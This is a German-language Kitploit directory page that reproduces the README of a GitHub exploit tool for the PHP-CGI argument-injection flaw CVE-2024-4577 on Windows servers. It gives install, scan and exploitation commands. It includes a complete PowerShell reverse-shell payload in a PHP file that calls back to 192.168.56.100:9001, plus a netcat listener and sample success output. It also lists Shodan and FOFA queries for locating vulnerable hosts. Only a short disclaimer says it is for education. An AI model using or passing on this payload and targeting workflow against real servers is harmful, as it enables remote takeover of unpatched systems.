Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577-RCE — Exploit für PHP-CGI-Argument-Injection (CVE-2024-4577), der Remote-Code-Ausführung auf verwundbaren Windows-Servern mit Apache und PHP-CGI ermöglicht. Umfasst Scannen, Exploitation und die Bereitstellung von Reverse-Shell-Payloads. | Kitploit
Tools/GitHubGitHub/gh-ost00/cve-2024-4577-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubgh-ost00/cve-2024-4577-rce

CVE-2024-4577-RCE

Exploit für PHP-CGI-Argument-Injection (CVE-2024-4577), der Remote-Code-Ausführung auf verwundbaren Windows-Servern mit Apache und PHP-CGI ermöglicht. Umfasst Scannen, Exploitation und die Bereitstellung von Reverse-Shell-Payloads.

Repository anzeigen
25536vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PHP CGI Argumenteinschleusung (CVE-2024-4577) RCE

📜 Beschreibung

In PHP-Versionen 8.1.* vor 8.1.29, 8.2.* vor 8.2.20, 8.3.* vor 8.3.8 kann Windows unter Verwendung von Apache und PHP-CGI auf Windows, wenn das System so eingerichtet ist, dass bestimmte Codepages verwendet werden, das „Best-Fit“-Verhalten anwenden, um Zeichen in der Befehlszeile zu ersetzen, die an Win32-API-Funktionen übergeben werden. Das PHP-CGI-Modul kann diese Zeichen fälschlicherweise als PHP-Optionen interpretieren, was es einem böswilligen Benutzer ermöglichen kann, Optionen an die ausgeführte PHP-Binärdatei zu übergeben und so den Quellcode von Skripten offenzulegen, beliebigen PHP-Code auf dem Server auszuführen usw.

„XAMPP ist in einer Standardkonfiguration verwundbar, und wir können den Endpunkt /php-cgi/php-cgi.exe anvisieren. Um einen .php-Endpunkt (z. B. /index.php) anzugreifen, muss der Server so konfiguriert sein, dass PHP-Skripte im CGI-Modus ausgeführt werden.“

🛠️ Installation

root@kitploit:~
$ git clone https://github.com/fa-rrel/CVE-2024-4577-RCE/
$ cd CVE-2024-4577-RCE && pip install -r requirements.txt 

⚙️ Verwendung

$ python3 CVE-2024-4577.py -s -t https://target.com/

🤖 Einrichten einer Reverse Shell

PHP-Payload

[!NOTE] Dieses Tool demonstriert realistische Angriffsmethoden und -techniken (TTPs). Dieses spezifische Payload-Beispiel funktioniert jedoch in diesem Szenario nicht. Ändern Sie die shell.php, um eine voll funktionsfähige Payload zu erhalten.

root@kitploit:~
# rev_shell.php
<?php
$payload = "powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('192.168.56.100', 9001);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\";

exec($payload);
?>
 

🖥️ Server scannen

root@kitploit:~
$ python3 CVE-2024-4577.py -s -t https://target.com/                                                   
  ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
 / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
| |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
| |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
 \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
Author: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC & Scanning  

[+] Target https://target.com ist anfällig für CVE-2024-4577

🎯 Angriff auf den verwundbaren Server

root@kitploit:~
$ python3 CVE-2024-4577.py -t {targetsite.txt} -e -p rev_shell.php
                                                  
 ______     _______   ____   ___ ____  _  _         _  _  ____ _____ _____ 
 / ___\ \   / / ____| |___ \ / _ \___ \| || |       | || || ___|___  |___  |
| |    \ \ / /|  _|     __) | | | |__) | || |_ _____| || ||___ \  / /   / / 
| |___  \ V / | |___   / __/| |_| / __/|__   _|_____|__   _|__) |/ /   / /  
 \____|  \_/  |_____| |_____|\___/_____|  |_|          |_||____//_/   /_/    
Author: Ghost_sec | Youtube.com/Ghost_sec | Github.com/fa-rrel | POC & Scanning  

[+] Exploit erfolgreich!

👨🏻‍💻 Netcat-Listener

root@kitploit:~
$ nc -lvnp 9001

🔍 Verwundbare Hosts finden

  • Shodan: server: PHP 8.1, server: PHP 8.2, server: PHP 8.3
  • FOFA: protocol="http" && header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3"

💁 Referenzen

  • https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577
  • https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2024/CVE-2024-4577.yaml
  • http://www.openwall.com/lists/oss-security/2024/06/07/1
  • https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/php_cgi_arg_injection_rce_cve_2024_4577.rb
  • https://www.php.net/ChangeLog-8.php#8.1.29
  • https://www.php.net/ChangeLog-8.php#8.2.20
  • https://www.php.net/ChangeLog-8.php#8.3.8
  • https://github.com/l0n3m4n/CVE-2024-4577-RCE/

⚠️ Haftungsausschluss

Dieses Tool wird nur zu Bildungs- und Forschungszwecken bereitgestellt. Der Ersteller übernimmt keine Verantwortung für jeglichen Missbrauch oder Schaden, der durch das Tool verursacht wird.

Tool herunterladen